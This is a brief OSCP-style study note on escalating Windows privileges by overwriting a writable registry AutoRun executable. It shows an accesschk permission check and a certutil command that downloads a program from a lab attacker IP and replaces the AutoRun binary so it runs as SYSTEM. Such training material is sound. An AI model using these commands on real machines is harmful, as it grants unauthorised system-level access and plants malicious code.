// notes/ PrivEsc — Windows
🪟

Registy Autoruns

AutoRun is a feature that will automatically runs a program or application when a drive is mounted. This can be exploited by changing the executable of an existing Autorun program…

#windows privilege escalation#adot8
source · oscp.adot8.com · windows-privilege-escalation/registy_autoruns

AutoRuns

Overview

AutoRun is a feature that will automatically runs a program or application when a drive is mounted. This can be exploited by changing the executable of an existing Autorun program. When the computer restarts and an Administrator logs in it will run the malicious executable as system.

Escalation via AutoRun

Check for AutoRuns in the registry using PowerUp

<figure><img src="/files/7WGNkZLZJ1hOIYjdfUjB" alt=""><figcaption><p>TCM Windows Priv Esc on THM</p></figcaption></figure>

Check for write access to the file. Should return with FILE_ALL_ACCESS under RW Everyone

powerquery
01accesschk64.exe -wvu "C:\Program Files\AutorunProgram.exe"

Replace AutoRun executable

powerquery
01certutil.exe -urlcache -f http://10.10.14.1/program.exe "C:\Program Files\Autorun Program\program.exe"